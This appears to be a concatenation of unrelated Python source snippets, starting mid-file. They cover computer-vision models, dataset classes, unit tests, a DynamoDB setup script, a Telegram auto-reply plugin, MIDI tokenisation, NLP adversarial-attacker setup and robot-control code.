all_people_names = list(self.all_people.keys())
while True:
# draw a person at random
person1 = random.choice(all_people_names)
# flip a coin to decide whether we fetch a photo of the same person vs different person
same_person = random.random() > 0.5
if same_person:
person2 = person1
else:
# repeatedly pick random names until we find a different name
person2 = person1
while person2 == person1:
person2 = random.choice(all_people_names)
person1_photo = random.choice(self.all_people[person1])
person2_photo = random.choice(self.all_people[person2])
yield ({self.person1: person1_photo,
self.person2: person2_photo,
self.label: same_person})
|
104575
|
import matplotlib.pyplot as plt
import cv2
import numpy as np
def plot_imgs(imgs, titles=None, cmap='brg', ylabel='', normalize=True, ax=None,
r=(0, 1), dpi=100):
n = len(imgs)
if not isinstance(cmap, list):
cmap = [cmap]*n
if ax is None:
_, ax = plt.subplots(1, n, figsize=(6*n, 6), dpi=dpi)
if n == 1:
ax = [ax]
else:
if not isinstance(ax, list):
ax = [ax]
assert len(ax) == len(imgs)
for i in range(n):
if len(imgs[i].shape) == 3:
if imgs[i].shape[-1] == 3:
imgs[i] = imgs[i][..., ::-1] # BGR to RGB
elif imgs[i].shape[-1] == 1:
imgs[i] = imgs[i][..., 0]
if len(imgs[i].shape) == 2 and cmap[i] == 'brg':
cmap[i] = 'gray'
ax[i].imshow(imgs[i], cmap=plt.get_cmap(cmap[i]),
vmin=None if normalize else r[0],
vmax=None if normalize else r[1])
if titles:
ax[i].set_title(titles[i])
ax[i].get_yaxis().set_ticks([])
ax[i].get_xaxis().set_ticks([])
for spine in ax[i].spines.values(): # remove frame
spine.set_visible(False)
ax[0].set_ylabel(ylabel)
plt.tight_layout()
def draw_datches(img1, kp1, img2, kp2, matches, color=None, kp_radius=5,
thickness=2, margin=20):
# Create frame
if len(img1.shape) == 3:
new_shape = (max(img1.shape[0], img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin,
img1.shape[2])
elif len(img1.shape) == 2:
new_shape = (max(img1.shape[0],
img2.shape[0]),
img1.shape[1]+img2.shape[1]+margin)
new_img = np.ones(new_shape, type(img1.flat[0]))*255
# Place original images
new_img[0:img1.shape[0], 0:img1.shape[1]] = img1
new_img[0:img2.shape[0],
img1.shape[1]+margin:img1.shape[1]+img2.shape[1]+margin] = img2
# Draw lines between matches
if color:
c = color
for m in matches:
# Generate random color for RGB/BGR and grayscale images as needed.
if not color:
if len(img1.shape) == 3:
c = np.random.randint(0, 256, 3)
else:
c = np.random.randint(0, 256)
c = (int(c[0]), int(c[1]), int(c[2]))
end1 = tuple(np.round(kp1[m.trainIdx].pt).astype(int))
end2 = tuple(np.round(kp2[m.queryIdx].pt).astype(int)
+ np.array([img1.shape[1]+margin, 0]))
cv2.line(new_img, end1, end2, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end1, kp_radius, c, thickness, lineType=cv2.LINE_AA)
cv2.circle(new_img, end2, kp_radius, c, thickness, lineType=cv2.LINE_AA)
return new_img
|
104601
|
import numpy as np
import utils
from dataset_specifications.dataset import Dataset
class ConstNoiseSet(Dataset):
def __init__(self):
super().__init__()
self.name = "const_noise"
self.std_dev = np.sqrt(0.25)
def get_support(self, x):
return (x-2*self.std_dev, x+2*self.std_dev)
def sample(self, n):
xs = np.random.uniform(low=-1., high=1., size=n)
noise = np.random.normal(loc=0., scale=self.std_dev, size=n)
ys = xs + noise
return np.stack((xs, ys), axis=1)
def get_pdf(self, x):
return utils.get_gaussian_pdf(x, self.std_dev)
|
104624
|
from collections import OrderedDict, defaultdict
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import time
import torch
from FClip.line_parsing import OneStageLineParsing
from FClip.config import M
from FClip.losses import ce_loss, sigmoid_l1_loss, focal_loss, l12loss
from FClip.nms import structure_nms_torch
class FClip(nn.Module):
def __init__(self, backbone):
super(FClip, self).__init__()
self.backbone = backbone
self.M_dic = M.to_dict()
self._get_head_size()
def _get_head_size(self):
head_size = []
for h in self.M_dic['head']['order']:
head_size.append([self.M_dic['head'][h]['head_size']])
self.head_off = np.cumsum([sum(h) for h in head_size])
def lcmap_head(self, output, target):
name = "lcmap"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx-1]
pred = output[s: self.head_off[offidx]].reshape(self.M_dic['head'][name]['head_size'], batch, row, col)
if self.M_dic['head'][name]['loss'] == "Focal_loss":
alpha = self.M_dic['head'][name]['focal_alpha']
loss = focal_loss(pred, target, alpha)
elif self.M_dic['head'][name]['loss'] == "CE":
loss = ce_loss(pred, target, None)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(1, 0, 2, 3).softmax(1)[:, 1], loss * weight
def lcoff_head(self, output, target, mask):
name = 'lcoff'
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(self.M_dic['head'][name]['head_size'], batch, row, col)
loss = sum(
sigmoid_l1_loss(pred[j], target[j], offset=-0.5, mask=mask)
for j in range(2)
)
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(1, 0, 2, 3).sigmoid() - 0.5, loss * weight
def lleng_head(self, output, target, mask):
name = 'lleng'
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(batch, row, col)
if self.M_dic['head'][name]['loss'] == "sigmoid_L1":
loss = sigmoid_l1_loss(pred, target, mask=mask)
pred = pred.sigmoid()
elif self.M_dic['head'][name]['loss'] == "L1":
loss = l12loss(pred, target, mask=mask)
pred = pred.clamp(0., 1.)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred, loss * weight
def angle_head(self, output, target, mask):
name = 'angle'
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(batch, row, col)
if self.M_dic['head'][name]['loss'] == "sigmoid_L1":
loss = sigmoid_l1_loss(pred, target, mask=mask)
pred = pred.sigmoid()
elif self.M_dic['head'][name]['loss'] == "L1":
loss = l12loss(pred, target, mask=mask)
pred = pred.clamp(0., 1.)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred, loss * weight
def jmap_head(self, output, target, n_jtyp):
name = "jmap"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(n_jtyp, self.M_dic['head'][name]['head_size'], batch, row, col)
if self.M_dic['head'][name]['loss'] == "Focal_loss":
alpha = self.M_dic['head'][name]['focal_alpha']
loss = sum(
focal_loss(pred[i], target[i], alpha) for i in range(n_jtyp)
)
elif self.M_dic['head'][name]['loss'] == "CE":
loss = sum(
ce_loss(pred[i], target[i], None) for i in range(n_jtyp)
)
else:
raise NotImplementedError
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(2, 0, 1, 3, 4).softmax(2)[:, :, 1], loss * weight
def joff_head(self, output, target, n_jtyp, mask):
name = "joff"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(
n_jtyp, self.M_dic['head'][name]['head_size'], batch, row, col)
loss = sum(
sigmoid_l1_loss(pred[i, j], target[i, j], scale=1.0, offset=-0.5, mask=mask[i])
for i in range(n_jtyp)
for j in range(2)
)
weight = self.M_dic['head'][name]['loss_weight']
return pred.permute(2, 0, 1, 3, 4).sigmoid() - 0.5, loss * weight
def lmap_head(self, output, target):
name = "lmap"
_, batch, row, col = output.shape
order = self.M_dic['head']['order']
offidx = order.index(name)
s = 0 if offidx == 0 else self.head_off[offidx - 1]
pred = output[s: self.head_off[offidx]].reshape(batch, row, col)
loss = (
F.binary_cross_entropy_with_logits(pred, target, reduction="none")
.mean(2)
.mean(1)
)
weight = self.M_dic['head'][name]['loss_weight']
return pred.sigmoid(), loss * weight
def forward(self, input_dict, isTest=False):
if isTest:
return self.test_forward(input_dict)
else:
return self.trainval_forward(input_dict)
def test_forward(self, input_dict):
extra_info = {
'time_front': 0.0,
'time_stack0': 0.0,
'time_stack1': 0.0,
'time_backbone': 0.0,
}
extra_info['time_backbone'] = time.time()
image = input_dict["image"]
outputs, feature, backbone_time = self.backbone(image)
extra_info['time_front'] = backbone_time['time_front']
extra_info['time_stack0'] = backbone_time['time_stack0']
extra_info['time_stack1'] = backbone_time['time_stack1']
extra_info['time_backbone'] = time.time() - extra_info['time_backbone']
output = outputs[0]
heatmap = {}
heatmap["lcmap"] = output[:, 0: self.head_off[0]].softmax(1)[:, 1]
heatmap["lcoff"] = output[:, self.head_off[0]: self.head_off[1]].sigmoid() - 0.5
heatmap["lleng"] = output[:, self.head_off[1]: self.head_off[2]].sigmoid()
heatmap["angle"] = output[:, self.head_off[2]: self.head_off[3]].sigmoid()
parsing = True
if parsing:
lines, scores = [], []
for k in range(output.shape[0]):
line, score = OneStageLineParsing.fclip_torch(
lcmap=heatmap["lcmap"][k],
lcoff=heatmap["lcoff"][k],
lleng=heatmap["lleng"][k],
angle=heatmap["angle"][k],
delta=M.delta,
resolution=M.resolution
)
if M.s_nms > 0:
line, score = structure_nms_torch(line, score, M.s_nms)
lines.append(line[None])
scores.append(score[None])
heatmap["lines"] = torch.cat(lines)
heatmap["score"] = torch.cat(scores)
return {'heatmaps': heatmap, 'extra_info': extra_info}
def trainval_forward(self, input_dict):
image = input_dict["image"]
outputs, feature, backbone_time = self.backbone(image)
result = {"feature": feature}
batch, channel, row, col = outputs[0].shape
T = input_dict["target"].copy()
n_jtyp = 1
T["lcoff"] = T["lcoff"].permute(1, 0, 2, 3)
losses = []
accuracy = []
for stack, output in enumerate(outputs):
output = output.transpose(0, 1).reshape([-1, batch, row, col]).contiguous()
L = OrderedDict()
Acc = OrderedDict()
heatmap = {}
lcmap, L["lcmap"] = self.lcmap_head(output, T["lcmap"])
lcoff, L["lcoff"] = self.lcoff_head(output, T["lcoff"], mask=T["lcmap"])
heatmap["lcmap"] = lcmap
heatmap["lcoff"] = lcoff
lleng, L["lleng"] = self.lleng_head(output, T["lleng"], mask=T["lcmap"])
angle, L["angle"] = self.angle_head(output, T["angle"], mask=T["lcmap"])
heatmap["lleng"] = lleng
heatmap["angle"] = angle
losses.append(L)
accuracy.append(Acc)
if stack == 0 and input_dict["do_evaluation"]:
result["heatmaps"] = heatmap
result["losses"] = losses
result["accuracy"] = accuracy
return result
|
104674
|
import json
from lints.vim import VimVint, VimLParserLint
def test_vint_undefined_variable():
msg = ['t.vim:3:6: Undefined variable: s:test (see :help E738)']
res = VimVint().parse_loclist(msg, 1)
assert json.loads(res)[0] == {
"lnum": "3",
"col": "6",
"text": "[vint]Undefined variable: s:test (see :help E738)",
"enum": 1,
"bufnr": 1,
"type": "E"
}
def test_vimlparser_message_wihtout_code():
msg = ['CCTree/plugin/cctree.vim:549:18: vimlparser: unexpected EOL']
res = VimLParserLint().parse_loclist(msg, 1)
assert json.loads(res)[0] == {
"lnum": "549",
"col": "18",
"text": '[vimlparser]unexpected EOL',
"enum": 1,
"bufnr": 1,
"type": "E",
"code": None,
"error": None,
"warning": None,
}
def test_vimlparser_message_with_code():
msg = ['vim-unite-vcs/autoload/vcs/git/revert.vim:29:19: vimlparser: E488: Trailing characters: )'] # noqa
res = VimLParserLint().parse_loclist(msg, 1)
assert json.loads(res)[0] == {
"lnum": "29",
"col": "19",
"text": '[vimlparser]E488: Trailing characters: )',
"enum": 1,
"bufnr": 1,
"type": "E",
"code": "488",
"error": "E",
"warning": None,
}
|
104678
|
import unittest
import numpy as np
import pytest
from audiomentations import TanhDistortion
from audiomentations.core.utils import calculate_rms
class TestTanhDistortion(unittest.TestCase):
def test_single_channel(self):
samples = np.random.normal(0, 0.1, size=(2048,)).astype(np.float32)
sample_rate = 16000
augmenter = TanhDistortion(min_distortion=0.2, max_distortion=0.6, p=1.0)
distorted_samples = augmenter(samples=samples, sample_rate=sample_rate)
self.assertEqual(samples.dtype, distorted_samples.dtype)
self.assertEqual(samples.shape, distorted_samples.shape)
assert np.amax(distorted_samples) < np.amax(samples)
assert calculate_rms(distorted_samples) == pytest.approx(
calculate_rms(samples), abs=1e-3
)
def test_multichannel(self):
num_channels = 3
samples = np.random.normal(0, 0.1, size=(num_channels, 5555)).astype(np.float32)
sample_rate = 16000
augmenter = TanhDistortion(min_distortion=0.05, max_distortion=0.6, p=1.0)
distorted_samples = augmenter(samples=samples, sample_rate=sample_rate)
self.assertEqual(samples.dtype, distorted_samples.dtype)
self.assertEqual(samples.shape, distorted_samples.shape)
for i in range(num_channels):
assert not np.allclose(samples[i], distorted_samples[i])
assert calculate_rms(distorted_samples[i]) == pytest.approx(
calculate_rms(samples[i]), abs=1e-3
)
|
104690
|
from distutils.core import setup
setup(
name='eagle-diff',
version='0.1.0',
description='Show differences between Cadsoft Eagle files',
author='<NAME>',
author_email='<EMAIL>',
long_description=open('README.md').read(),
license=open('LICENSE').read(),
url='https://github.com/fxkr/eagle-diff',
packages=[],
scripts=['eagle-diff'])
|
104706
|
import re, os, glob
def CollectData(N, mem):
for fn in glob.glob("search_tmp.*"):
os.remove(fn)
with open("search.cpp", "rt") as f:
src = f.read()
ints = mem / 8
src = re.sub(r"const int SIZE = (\d*);", r"const int SIZE = %d;" % N, src)
src = re.sub(r"const int ARR_SAMPLES = (\(.*?\))", r"const int ARR_SAMPLES = %d" % ints, src)
src = re.sub(r"const int KEY_SAMPLES = (\(.*?\))", r"const int KEY_SAMPLES = %d" % ints, src)
with open("search_tmp.cpp", "wt") as f:
f.write(src)
with open("c.bat", "rt") as f:
bat = f.read()
bat = bat.replace("search.cpp", "search_tmp.cpp")
os.system(bat)
logname = "res_%04d_%d.log" % (N, mem)
os.system("search_tmp >res/" + logname)
os.system("search_tmp >res/" + logname)
for fn in glob.glob("res/*"):
os.remove(fn)
sizes = [16, 32, 64, 128, 256, 512, 1024]
#sizes = [128, 256, 512, 1024, 2048, 4096]
for s in sizes:
CollectData(s, 64<<10)
# CollectData(s, 512<<10)
|
104714
|
import pytest
from tests.communication.test_FileComm import TestFileComm as base_class
class TestAsciiFileComm(base_class):
r"""Test for AsciiFileComm communication class."""
@pytest.fixture(scope="class", autouse=True)
def filetype(self):
r"""Communicator type being tested."""
return "ascii"
def test_send_recv_comment(self, send_comm, recv_comm, testing_options):
r"""Test send/recv with commented message."""
msg_send = send_comm.serializer.comment + testing_options['msg']
flag = send_comm.send(msg_send)
assert(flag)
flag, msg_recv = recv_comm.recv()
assert(not flag)
assert(msg_recv == recv_comm.eof_msg)
|
104799
|
import os
import pickle
import random
import traceback
from collections import defaultdict
from telethon import utils as telethon_utils
from telethon.sync import events
from plugins.base import Telegram, PluginMount
from utils import get_url
class Action(Telegram, metaclass=PluginMount):
command_name = "auto_reply_test"
def __call__(self, chat, reply):
import aioredis
@self._client.on(events.NewMessage)
async def _inner(evt):
msg = evt.message
try:
to_chat = await evt.get_chat()
sender = await msg.get_sender()
if not msg.is_reply and to_chat.username == chat or to_chat.id == chat:
self._log_message(msg, to_chat, sender)
await evt.reply(reply)
except Exception as e:
traceback.print_exc()
self._set_file_handler("auto_reply_test")
self._logger.info(f"Auto reply start for chat {chat}, reply: {reply}")
self._client.start()
self._client.run_until_disconnected()
|
104804
|
import os
import toml
import jsbsim
configuration = toml.load('../config/default_configuration.toml') # included: '/Users/######/Programme/jsbsim-code' #an System anpassen.
sim = jsbsim.FGFDMExec(os.path.expanduser(configuration["simulation"]["path_jsbsim"]))
sim.load_model('c172p')
print(sim.print_property_catalog())
|
104835
|
import random
from binary_search_tree import BinarySearchTree
def test_bst_size():
bst = BinarySearchTree()
assert len(bst) == 0
for i in range(5):
bst.insert(i)
assert len(bst) == i + 1
def test_bst_insert_at_right_pos():
bst = BinarySearchTree()
bst.insert(15)
assert bst._root._data == 15
bst.insert(12)
assert bst._root._left._data == 12
bst.insert(18)
assert bst._root._right._data == 18
bst.insert(16)
assert bst._root._right._left._data == 16
assert repr(bst) == "12 15 16 18"
bst2 = BinarySearchTree()
data = [x for x in range(10)]
random.shuffle(data)
for i in data:
bst2.insert(i)
assert repr(bst2) == ' '.join(map(str, sorted(data)))
def test_bst_search():
bst = BinarySearchTree([5, 1, 6, 3, 8])
assert bst.search(1) == True
assert bst.search(10) == False
assert bst.search(8) == True
bst.insert(100)
assert bst.search(100) == True
def test_bst_delete():
bst = BinarySearchTree()
bst.insert(1)
assert bst.search(1) == True
bst.delete(1)
assert bst.search(1) == False
bst.insert(21)
bst.insert(28)
bst.insert(14)
bst.insert(32)
bst.insert(25)
bst.insert(18)
bst.insert(11)
bst.insert(30)
bst.insert(19)
bst.insert(27)
assert bst.search(11) == True
bst.delete(11)
assert bst.search(11) == False
assert bst.search(18) == True
bst.delete(18)
assert bst.search(18) == False
bst.delete(28)
assert bst.search(28) == False
assert repr(bst) == "14 19 21 25 27 30 32"
|
104840
|
from __future__ import print_function # Python 2/3 compatibility
import boto3
def create_quotes():
table = client.create_table(
TableName='Quotes.EOD',
KeySchema=[
{
'AttributeName': 'Symbol',
'KeyType': 'HASH' # Partition key
},
{
'AttributeName': 'Date',
'KeyType': 'RANGE' # Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'Symbol',
'AttributeType': 'S'
},
{
'AttributeName': 'Date',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
w = client.get_waiter('table_exists')
w.wait(TableName='Quotes.EOD')
print("table Quotes.EOD created")
print("Table status:", table)
def create_securities():
table = client.create_table(
TableName='Securities',
KeySchema=[
{
'AttributeName': 'Symbol',
'KeyType': 'HASH' # Partition key
},
{
'AttributeName': 'Broker',
'KeyType': 'RANGE' # Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'Symbol',
'AttributeType': 'S'
},
{
'AttributeName': 'Broker',
'AttributeType': 'S'
}
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
w = client.get_waiter('table_exists')
w.wait(TableName='Securities')
print("table Securities created")
print("Table status:", table)
client = boto3.client('dynamodb', region_name='us-east-1')
try:
if 'Quotes.EOD' in client.list_tables()['TableNames']:
client.delete_table(TableName='Quotes.EOD')
waiter = client.get_waiter('table_not_exists')
waiter.wait(TableName='Quotes.EOD')
print("table Quotes.EOD deleted")
if 'Securities' in client.list_tables()['TableNames']:
client.delete_table(TableName='Securities')
waiter = client.get_waiter('table_not_exists')
waiter.wait(TableName='Securities')
print("table Securities deleted")
except Exception as e:
print(e)
create_securities()
create_quotes()
|
104936
|
import json
def extract_json_data(filename):
with open(filename, "r") as file:
data = json.load(file)
return data
|
104998
|
from mgt.datamanagers.data_manager import Dictionary
class DictionaryGenerator(object):
@staticmethod
def create_dictionary() -> Dictionary:
"""
Creates a dictionary for a REMI-like mapping of midi events.
"""
dictionary = [{}, {}]
def append_to_dictionary(word):
if word not in dictionary[0]:
offset = len(dictionary[0])
dictionary[0].update({word: offset})
dictionary[1].update({offset: word})
# First word is reserved for padding
append_to_dictionary("pad")
append_to_dictionary("mask")
append_to_dictionary("start-track")
append_to_dictionary("end-track")
# Instrument indicates the midi instrument program value 0-127
# and value 128 reserved for instruments with is_drum = true
for i in range(129):
append_to_dictionary(f"program_{i}")
# Midi pitch value between 0-127
for i in range(128):
append_to_dictionary(f"note_{i}")
# Duration indicates the duration of a note in 1/32th note intervals (1-128)
for i in range(128):
append_to_dictionary(f"duration_{i + 1}")
# Time shift in 1/32th note intervals (1-128)
for i in range(128):
append_to_dictionary(f"time-shift_{i + 1}")
# Velocity is a value between 0-127, which we divide into 32 bins
for i in range(32):
append_to_dictionary(f"velocity_{i}")
# Tempo is a value between 10-200 divided into bins of 5 (so 1-40)
# for i in range(20):
# append_to_dictionary(f"tempo_{i + 1}")
return Dictionary(dictionary[0], dictionary[1])
|
105030
|
from .device_address_pb2_grpc import *
from .device_address_pb2 import *
from .device_pb2_grpc import *
from .device_pb2 import *
from .lorawan_pb2_grpc import *
from .lorawan_pb2 import *
|
105080
|
from OpenAttack import substitute
import sys, os
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.abspath(__file__)),
".."
))
import OpenAttack
def get_attackers_on_chinese(dataset, clsf):
triggers = OpenAttack.attackers.UATAttacker.get_triggers(clsf, dataset, clsf.tokenizer)
attackers = [
OpenAttack.attackers.FDAttacker(token_unk=clsf.token_unk, lang="chinese"),
OpenAttack.attackers.UATAttacker(triggers=triggers, lang="chinese"),
OpenAttack.attackers.TextBuggerAttacker(lang="chinese"),
OpenAttack.attackers.GeneticAttacker(lang="chinese", filter_words=["的", "了", "着"]),
OpenAttack.attackers.PWWSAttacker(lang="chinese"),
OpenAttack.attackers.PSOAttacker(lang="chinese")
]
return attackers
|
105082
|
from datetime import datetime
from notifications_utils.template import SMSMessageTemplate
from app import statsd_client
from app.celery.service_callback_tasks import send_delivery_status_to_service
from app.config import QueueNames
from app.dao import notifications_dao
from app.dao.notifications_dao import dao_update_notification
from app.dao.service_callback_api_dao import (
get_service_delivery_status_callback_api_for_service,
)
from app.dao.templates_dao import dao_get_template_by_id
from app.models import NOTIFICATION_PENDING
from app.notifications.callbacks import create_delivery_status_callback_data
def _process_for_status(notification_status, client_name, provider_reference):
# record stats
notification = notifications_dao.update_notification_status_by_id(
notification_id=provider_reference,
status=notification_status,
sent_by=client_name.lower(),
)
if not notification:
return
statsd_client.incr("callback.{}.{}".format(client_name.lower(), notification_status))
if notification.sent_at:
statsd_client.timing_with_dates(
"callback.{}.elapsed-time".format(client_name.lower()),
datetime.utcnow(),
notification.sent_at,
)
if notification.billable_units == 0:
service = notification.service
template_model = dao_get_template_by_id(notification.template_id, notification.template_version)
template = SMSMessageTemplate(
template_model.__dict__,
values=notification.personalisation,
prefix=service.name,
show_prefix=service.prefix_sms,
)
notification.billable_units = template.fragment_count
notifications_dao.dao_update_notification(notification)
if notification_status != NOTIFICATION_PENDING:
service_callback_api = get_service_delivery_status_callback_api_for_service(service_id=notification.service_id)
# queue callback task only if the service_callback_api exists
if service_callback_api:
encrypted_notification = create_delivery_status_callback_data(notification, service_callback_api)
send_delivery_status_to_service.apply_async(
[str(notification.id), encrypted_notification],
queue=QueueNames.CALLBACKS,
)
success = "{} callback succeeded. reference {} updated".format(client_name, provider_reference)
return success
def set_notification_sent_by(notification, client_name):
notification.sent_by = client_name
dao_update_notification(notification)
|
105108
|
import torch, torchvision
class CIFAR10(torchvision.datasets.CIFAR10):
def __init__(self, root, part, labeled_factors, transform):
super().__init__(root, part == 'train', transform = transform, download = True)
if len(labeled_factors) == 0:
self.has_label = False
self.nclass = []
self.class_freq = []
else:
self.has_label = True
self.nclass = [10]
class_count = torch.tensor(self.targets).bincount(minlength = 10)
self.class_freq = [class_count.float() / self.data.shape[0]]
def __getitem__(self, k):
img, target = super().__getitem__(k)
return (img, torch.tensor([target])) if self.has_label else img
|
105114
|
import numpy as np
from scipy.interpolate import RectBivariateSpline
def TemplateCorrection(T, It1, rect, p0 = np.zeros(2)):
threshold = 0.1
x1_t, y1_t, x2_t, y2_t = rect[0], rect[1], rect[2], rect[3]
Iy, Ix = np.gradient(It1)
rows_img, cols_img = It1.shape
rows_rect, cols_rect = T.shape
dp = [[cols_img], [rows_img]]
# what can be precomputed
y = np.arange(0, rows_img, 1)
x = np.arange(0, cols_img, 1)
spline1 = RectBivariateSpline(y, x, It1)
spline_gx = RectBivariateSpline(y, x, Ix)
spline_gy = RectBivariateSpline(y, x, Iy)
jac = np.array([[1,0],[0,1]])
while np.square(dp).sum() > threshold:
x1_w, y1_w = x1_t + p0[0], y1_t + p0[1]
x2_w, y2_w = x2_t + p0[0], y2_t + p0[1]
cw = np.linspace(x1_w, x2_w, cols_rect)
rw = np.linspace(y1_w, y2_w, rows_rect)
ccw, rrw = np.meshgrid(cw, rw)
warpImg = spline1.ev(rrw, ccw)
#compute error image
err = T - warpImg
errImg = err.reshape(-1,1)
#compute gradient
Ix_w = spline_gx.ev(rrw, ccw)
Iy_w = spline_gy.ev(rrw, ccw)
#I is (n,2)
I = np.vstack((Ix_w.ravel(),Iy_w.ravel())).T
#computer Hessian
delta = I @ jac
#H is (2,2)
H = delta.T @ delta
#compute dp
#dp is (2,2)@(2,n)@(n,1) = (2,1)
dp = np.linalg.inv(H) @ (delta.T) @ errImg
#update parameters
p0[0] += dp[0,0]
p0[1] += dp[1,0]
rect[0] += p0[0]
rect[1] += p0[1]
rect[2] += p0[0]
rect[3] += p0[1]
|
105137
|
import logging
import tempfile
import unittest
from os import path
from Bio import SeqIO
from staramr.blast.JobHandler import JobHandler
from staramr.blast.plasmidfinder.PlasmidfinderBlastDatabase import PlasmidfinderBlastDatabase
from staramr.blast.resfinder.ResfinderBlastDatabase import ResfinderBlastDatabase
from staramr.databases.AMRDatabasesManager import AMRDatabasesManager
from staramr.databases.resistance.resfinder.ARGDrugTableResfinder import ARGDrugTableResfinder
from staramr.databases.resistance.pointfinder.ARGDrugTablePointfinder import ARGDrugTablePointfinder
from staramr.detection.AMRDetectionResistance import AMRDetectionResistance
logger = logging.getLogger('AMRDetectionMLST')
class AMRDetectionMLST(unittest.TestCase):
def setUp(self):
blast_databases_repositories = AMRDatabasesManager.create_default_manager().get_database_repos()
self.resfinder_dir = blast_databases_repositories.get_repo_dir(
'resfinder')
self.pointfinder_dir = blast_databases_repositories.get_repo_dir(
'pointfinder')
self.plasmidfinder_dir = blast_databases_repositories.get_repo_dir(
'plasmidfinder')
self.resfinder_database = ResfinderBlastDatabase(self.resfinder_dir)
self.resfinder_drug_table = ARGDrugTableResfinder()
self.pointfinder_drug_table = ARGDrugTablePointfinder()
self.plasmidfinder_database = PlasmidfinderBlastDatabase(
self.plasmidfinder_dir)
self.pointfinder_database = None
self.blast_out = tempfile.TemporaryDirectory()
self.blast_handler = JobHandler(
{'resfinder': self.resfinder_database, 'pointfinder': self.pointfinder_database,
'plasmidfinder': self.plasmidfinder_database}, 2, self.blast_out.name)
self.outdir = tempfile.TemporaryDirectory()
self.amr_detection = AMRDetectionResistance(self.resfinder_database, self.resfinder_drug_table,
self.blast_handler, self.pointfinder_drug_table,
self.pointfinder_database, output_dir=self.outdir.name)
self.test_data_dir = path.join(path.dirname(__file__), '..', 'data')
def tearDown(self):
self.blast_out.cleanup()
self.outdir.cleanup()
def testMLSTResults(self):
file = path.join(self.test_data_dir, "test-mlst-summary.fsa")
files = [file]
self.amr_detection.run_amr_detection(files, 99, 90, 90, 90,0,0,0,0,0)
mlst_results = self.amr_detection.get_mlst_results()
self.assertEqual(len(mlst_results.index), 1, 'Wrong number of results detected')
self.assertEqual(len(mlst_results.columns), 9, 'Wrong number of columns detected')
self.assertEqual(mlst_results['Scheme'].iloc[0], 'senterica', msg='Wrong Scheme')
self.assertEqual(mlst_results['Sequence Type'].iloc[0], '1', msg='Wrong Sequence Type')
self.assertEqual(mlst_results['Locus 1'].iloc[0], 'aroC(1)', msg='Wrong Locus 1 Result')
self.assertEqual(mlst_results['Locus 2'].iloc[0], 'dnaN(1)', msg='Wrong Locus 2 Result')
self.assertEqual(mlst_results['Locus 3'].iloc[0], 'hemD(1)', msg='Wrong Locus 3 Result')
self.assertEqual(mlst_results['Locus 4'].iloc[0], 'hisD(1)', msg='Wrong Locus 4 Result')
self.assertEqual(mlst_results['Locus 5'].iloc[0], 'purE(1)', msg='Wrong Locus 5 Result')
self.assertEqual(mlst_results['Locus 6'].iloc[0], 'sucA(1)', msg='Wrong Locus 6 Result')
self.assertEqual(mlst_results['Locus 7'].iloc[0], 'thrA(5)', msg='Wrong Locus 7 Result')
def testNoMLSTResults(self):
file = path.join(self.test_data_dir, "gyrA-S97N.fsa")
files = [file]
self.amr_detection.run_amr_detection(files, 99, 90, 90, 90,0,0,0,0,0)
mlst_results = self.amr_detection.get_mlst_results()
self.assertEqual(len(mlst_results.index), 1, 'Wrong number of results detected')
self.assertEqual(len(mlst_results.columns), 2, 'Wrong number of columns detected')
self.assertEqual(mlst_results['Scheme'].iloc[0], '-', msg='Scheme is found, expected none')
self.assertEqual(mlst_results['Sequence Type'].iloc[0], '-', msg='Sequence Type is found, expected none')
|
105150
|
import unittest
import subprocess
import psutil
import sys
import os
import numpy as np
import time
import socket
# Using pygame for gamepad interface
import pygame
# ROS
import rospy
import actionlib
import sensor_msgs.msg
import geometry_msgs.msg
import trajectory_msgs.msg
import rosgraph
import std_srvs.srv
import tf2_ros
import tf
# spartan
from spartan.utils.ros_utils import SimpleSubscriber, JointStateSubscriber
from spartan.utils.ros_utils import RobotService
import spartan.utils.ros_utils as ros_utils
import spartan.utils.utils as spartan_utils
import spartan.utils.transformations as transformations
import robot_control.control_utils as control_utils
from spartan.utils.schunk_driver import SchunkDriver
# spartan ROS
import robot_msgs.msg
def make_cartesian_trajectory_goal_world_frame(pos, quat, duration):
# (array([0.588497 , 0.00716426, 0.5159925 ]), array([ 0.70852019, -0.15500524, 0.67372875, 0.1416407 ]))
goal = robot_msgs.msg.CartesianTrajectoryGoal()
traj = goal.trajectory
# frame_id = "iiwa_link_ee"
frame_id = "base"
ee_frame_id = "iiwa_link_ee"
xyz_knot = geometry_msgs.msg.PointStamped()
xyz_knot.header.frame_id = frame_id
xyz_knot.point.x = 0
xyz_knot.point.y = 0
xyz_knot.point.z = 0
traj.xyz_points.append(xyz_knot)
xyz_knot = geometry_msgs.msg.PointStamped()
xyz_knot.header.frame_id = frame_id
xyz_knot.point.x = pos[0]
xyz_knot.point.y = pos[1]
xyz_knot.point.z = pos[2]
